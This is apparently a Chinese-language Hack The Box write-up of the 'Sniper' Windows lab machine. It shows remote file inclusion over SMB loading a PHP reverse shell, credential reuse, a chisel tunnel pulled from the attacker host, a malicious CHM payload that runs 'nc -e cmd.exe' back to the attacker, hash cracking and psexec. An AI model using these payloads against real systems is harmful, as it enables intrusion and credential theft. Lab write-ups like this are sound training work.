Sniper-htb-writeup

0x00 靶场技能介绍

章节技能：任意文件读取和文件包含、php_reverse_shell.php、MySQL配置泄露、密码复用、端口转发、chisel.exe、恶意CHM文件制作提权

参考链接：https://z10x64.github.io/posts/sniper-write-up---hackthebox/

0x01 用户权限获取

1、靶机介绍

Sniper 是一台中等难度的 Windows 计算机，配有 PHP 服务器。该服务器托管一个文件，该文件被发现易受本地和远程文件包含攻击。通过本地包含恶意制作的 PHP 会话文件，在“NT AUTHORITY\iUSR”上下文中在服务器上获得命令执行。暴露的数据库凭据用于以拥有相同密码的用户“Chris”的身份获得访问权限。枚举显示管理员正在查看 CHM（编译的 HTML 帮助）文件，该文件可用于泄露管理员的 NetNTLM-v2 哈希。可以捕获、破解它，并使用 PowerShell 凭据对象以管理员身份获取反向 shell。

2、获取下靶机IP地址：10.10.10.151

3、获取下开放端口情况：

──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,139,445,49667 -sC -sV --min-rate=5000 10.10.10.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 00:15 CST
Nmap scan report for 10.10.10.151
Host is up (0.47s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-27T15:25:56
|_  start_date: N/A
|_clock-skew: -51m40s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.56 seconds

4、访问下默认的80端口地址

http://10.10.10.151/

http://10.10.10.151/user/login.php

http://10.10.10.151/blog/index.php

5、经过枚举发现该 blog/?lang= 参数疑似存在任意文件读取

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\Windows\System32\drivers\etc\hosts'            
<html>
<body>
<!DOCTYPE html>
<html lang="en" >
..............

</body>

</html>
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
</body>
</html>

6、这里尝试使用使用网上开源的 php_reverse_shell.php 文件，尝试是否可以远程文件包含，这里先修改下这个PHP文件里的IP地址

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

7、在使用SMB服务进行远程文件包含

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver share . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49678)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:SHARE)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.151,49678)
[*] Remaining connections []

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\\10.10.14.45\share\php_reverse_shell.php'

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.151] 49718
SOCKET: Shell has connected! PID: 340
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
iis apppool\defaultapppool

C:\inetpub\wwwroot\blog>

8、在枚举中，发现了数据库的配置文件信息

C:\inetpub\wwwroot>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\inetpub\wwwroot

04/11/2019  10:51 AM    <DIR>          .
04/11/2019  10:51 AM    <DIR>          ..
04/11/2019  05:23 AM    <DIR>          blog
04/11/2019  05:23 AM    <DIR>          css
04/11/2019  05:23 AM    <DIR>          images
04/11/2019  05:22 PM             2,635 index.php
04/11/2019  05:23 AM    <DIR>          js
04/11/2019  05:23 AM    <DIR>          scss
10/01/2019  08:44 AM    <DIR>          user
               1 File(s)          2,635 bytes
               8 Dir(s)   2,420,936,704 bytes free

C:\inetpub\wwwroot>cd user

C:\inetpub\wwwroot\user>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\inetpub\wwwroot\user

10/01/2019  08:44 AM    <DIR>          .
10/01/2019  08:44 AM    <DIR>          ..
04/11/2019  05:15 PM               108 auth.php
04/11/2019  05:52 AM    <DIR>          css
04/11/2019  10:51 AM               337 db.php
04/11/2019  05:23 AM    <DIR>          fonts
04/11/2019  05:23 AM    <DIR>          images
04/11/2019  06:18 AM             4,639 index.php
04/11/2019  05:23 AM    <DIR>          js
04/11/2019  06:10 AM             6,463 login.php
04/08/2019  11:04 PM               148 logout.php
10/01/2019  08:42 AM             7,192 registration.php
08/14/2019  10:35 PM             7,004 registration_old123123123847.php
04/11/2019  05:23 AM    <DIR>          vendor
               7 File(s)         25,891 bytes
               7 Dir(s)   2,420,936,704 bytes free

C:\inetpub\wwwroot\user>type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

C:\inetpub\wwwroot\user>

9、这里再查看下当前系统的用户有几个

C:\inetpub\wwwroot\user>cd C:/

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\

10/01/2019  01:04 PM    <DIR>          Docs
04/09/2019  07:07 AM    <DIR>          inetpub
04/11/2019  06:44 AM    <DIR>          Microsoft
09/15/2018  12:19 AM    <DIR>          PerfLogs
04/29/2022  01:18 PM    <DIR>          Program Files
08/14/2019  10:38 PM    <DIR>          Program Files (x86)
04/11/2019  07:04 AM    <DIR>          Users
04/29/2022  01:19 PM    <DIR>          Windows
               0 File(s)              0 bytes
               8 Dir(s)   2,420,936,704 bytes free

C:\>cd Users

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\Users

04/11/2019  07:04 AM    <DIR>          .
04/11/2019  07:04 AM    <DIR>          ..
04/09/2019  06:47 AM    <DIR>          Administrator
04/11/2019  07:04 AM    <DIR>          Chris
04/09/2019  06:47 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,420,936,704 bytes free

C:\Users>

10、尝试验证该密码是否可复用

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.151 -u Chris -p '36mEAhz/B8xQ~2VM'
SMB         10.10.10.151    445    SNIPER           [*] Windows 10.0 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB         10.10.10.151    445    SNIPER           [+] Sniper\Chris:36mEAhz/B8xQ~2VM 

11、发现可以使用，那继续开始枚举

C:\Users>net user Chris
User name                    Chris
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/11/2019 6:53:37 AM
Password expires             Never
Password changeable          4/11/2019 6:53:37 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/27/2024 9:22:41 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.


C:\Users>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       6568
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:33060          0.0.0.0:0              LISTENING       6568
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1160
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1556
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2544
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       612
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       628
  TCP    10.10.10.151:80        10.10.14.45:48424      ESTABLISHED     4
  TCP    10.10.10.151:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.151:49718     10.10.14.45:443        ESTABLISHED     2228
  TCP    127.0.0.1:49672        127.0.0.1:49673        ESTABLISHED     6568
  TCP    127.0.0.1:49673        127.0.0.1:49672        ESTABLISHED     6568
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       872
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3306              [::]:0                 LISTENING       6568
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:33060             [::]:0                 LISTENING       6568
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       480
  TCP    [::]:49665             [::]:0                 LISTENING       1160
  TCP    [::]:49666             [::]:0                 LISTENING       1556
  TCP    [::]:49667             [::]:0                 LISTENING       2544
  TCP    [::]:49668             [::]:0                 LISTENING       612
  TCP    [::]:49669             [::]:0                 LISTENING       628
  UDP    0.0.0.0:123            *:*                                    2808
  UDP    0.0.0.0:500            *:*                                    2632
  UDP    0.0.0.0:4500           *:*                                    2632
  UDP    0.0.0.0:5353           *:*                                    1588
  UDP    0.0.0.0:5355           *:*                                    1588
  UDP    10.10.10.151:137       *:*                                    4
  UDP    10.10.10.151:138       *:*                                    4
  UDP    127.0.0.1:63095        *:*                                    3092
  UDP    [::]:123               *:*                                    2808
  UDP    [::]:500               *:*                                    2632
  UDP    [::]:4500              *:*                                    2632
  UDP    [::]:5353              *:*                                    1588
  UDP    [::]:5355              *:*                                    1588



C:\Users>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::140
   IPv6 Address. . . . . . . . . . . : dead:beef::4888:348:9d63:75c
   Link-local IPv6 Address . . . . . : fe80::4888:348:9d63:75c%14
   IPv4 Address. . . . . . . . . . . : 10.10.10.151
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9106%14
                                       10.10.10.2

C:\Users>

12、这里需要把 5985 给转发出来，便于我们进行winrm的远程登录

C:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\temp

05/27/2024  01:35 PM    <DIR>          .
05/27/2024  01:35 PM    <DIR>          ..
05/27/2024  01:09 PM    <DIR>          Microsoft
               0 File(s)              0 bytes
               3 Dir(s)   2,408,816,640 bytes free

C:\temp>powershell iwr -uri http://10.10.14.45/c.exe -Outfile c.exe

C:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\temp

05/27/2024  01:35 PM    <DIR>          .
05/27/2024  01:35 PM    <DIR>          ..
05/27/2024  01:39 PM         9,006,080 c.exe
05/27/2024  01:09 PM    <DIR>          Microsoft
               1 File(s)      9,006,080 bytes
               3 Dir(s)   2,399,809,536 bytes free

C:\temp>c.exe client 10.10.14.45:9002 R:5985:127.0.0.1:5985
2024/05/27 13:41:18 client: Connecting to ws://10.10.14.45:9002
2024/05/27 13:41:18 client: Connected (Latency 115.9075ms)

13、服务端也接收到了靶机的连接记录

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 9002 -reverse -v 
2024/05/28 05:38:49 server: Reverse tunnelling enabled
2024/05/28 05:38:49 server: Fingerprint Y+9hbCxIM37vG5hkg9SSAAZrj8E13nB/gQd8zktrGgg=
2024/05/28 05:38:49 server: Listening on http://0.0.0.0:9002
2024/05/28 05:43:08 server: session#1: Handshaking with 10.10.10.151:49740...
2024/05/28 05:43:08 server: session#1: Verifying configuration
2024/05/28 05:43:09 server: session#1: tun: Created
2024/05/28 05:43:09 server: session#1: tun: proxy#R:5985=>5985: Listening
2024/05/28 05:43:09 server: session#1: tun: Bound proxies
2024/05/28 05:43:09 server: session#1: tun: SSH connected

14、这里使用evil-winrm工具进行登录，并获取第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chris\Documents> whoami
sniper\chris
*Evil-WinRM* PS C:\Users\Chris\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Chris\Desktop> dir


    Directory: C:\Users\Chris\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/27/2024   8:08 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Chris\Desktop> cat user.txt
47e48f4889a7da718862c1195fd4d3a3
*Evil-WinRM* PS C:\Users\Chris\Desktop> 

0x02 系统权限获取

15、继续开始枚举信息

*Evil-WinRM* PS C:\Users\Chris\Desktop> cd C:/
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        10/1/2019   1:04 PM                Docs
d-----         4/9/2019   7:07 AM                inetpub
d-----        4/11/2019   6:44 AM                Microsoft
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        4/29/2022   1:18 PM                Program Files
d-----        8/14/2019  10:38 PM                Program Files (x86)
d-----        5/27/2024   1:35 PM                temp
d-r---        4/11/2019   7:04 AM                Users
d-----        4/29/2022   1:19 PM                Windows


*Evil-WinRM* PS C:\> cd Docs
*Evil-WinRM* PS C:\Docs> dir


    Directory: C:\Docs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> cat note.txt
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
*Evil-WinRM* PS C:\Docs> download "php for dummies-trial.pdf"
                                        
Info: Downloading C:\Docs\dummies-trial.pdf to dummies-trial.pdf
                                        
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Docs> 

16、在枚举时，发现了一个记事本信息，集合提示的信息应该就是让把文件上传到那个目录里

CHM（已编译 HTML 帮助）文件扩展名用于包含已编译格式的帮助文档的文件。CHM 文件通常与 Microsoft 的 HTML 帮助相关联，后者是 Windows 98 引入的专有在线帮助格式。

17、并且在用户的下载目录下发现了， .chm 文件

*Evil-WinRM* PS C:\Docs> dir C:/Users/Chris/downloads


    Directory: C:\Users\Chris\downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:36 AM          10462 instructions.chm


*Evil-WinRM* PS C:\Docs> download C:/Users/Chris/downloads
                                        
Info: Downloading C:/Users/Chris/downloads to downloads
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Docs> 

18、因此可能有一种方法可以创建一个恶意.chm文件，当他打开它时就会触发。

19、我找到了以下 nishang 脚本：https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1。用于生成.chm可用于运行 PowerShell 命令和脚本的恶意文件。

https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

*Evil-WinRM* PS C:\Docs> upload /home/kali/Desktop/Out-CHM.ps1
                                        
Info: Uploading /home/kali/Desktop/Out-CHM.ps1 to C:\Docs\Out-CHM.ps1
                                        
Data: 26000 bytes of 26000 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Docs> dir


    Directory: C:\Docs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        5/27/2024   1:47 PM          19502 Out-CHM.ps1
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Docs>
*Evil-WinRM* PS C:\Docs> Import-Module ./Out-CHM.ps1
*Evil-WinRM* PS C:\Docs> Out-CHM -Payload "\\10.10.14.45\share\nc.exe 10.10.14.45 53 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
The term 'C:\Program Files (x86)\HTML Help Workshop\hhc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Docs\Out-CHM.ps1:316 char:7
+     & "$HHC" "$OutputPath\doc.hhp"
+       ~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Program File...orkshop\hhc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Docs> 

20、这里由于环境的问题，我懒的再生成了，就直接参考演练报告了。

21、这里开始破解密码

❯ john -w:/usr/share/seclists/rockyou.txt hash
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
butterfly!#1     (Administrator)
1g 0:00:00:06 DONE (2024-01-01 22:26) 0.1620g/s 316659p/s 316659c/s 316659C/s byrd78..burlfire
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

22、直接登录管理员账号，并获取最终的flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.151
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.151.....
[*] Found writable share ADMIN$
[*] Uploading file CxHlLZHc.exe
[*] Opening SVCManager on 10.10.10.151.....
[*] Creating service Iqll on 10.10.10.151.....
[*] Starting service Iqll.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:/Users/administrator/Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\Users\Administrator\Desktop

03/22/2023  10:22 AM    <DIR>          .
03/22/2023  10:22 AM    <DIR>          ..
05/27/2024  08:08 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,398,326,784 bytes free

C:\Users\Administrator\Desktop> type root.txt
55f2bd84b8ecf828cca979ec066fe4ed

C:\Users\Administrator\Desktop> 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/211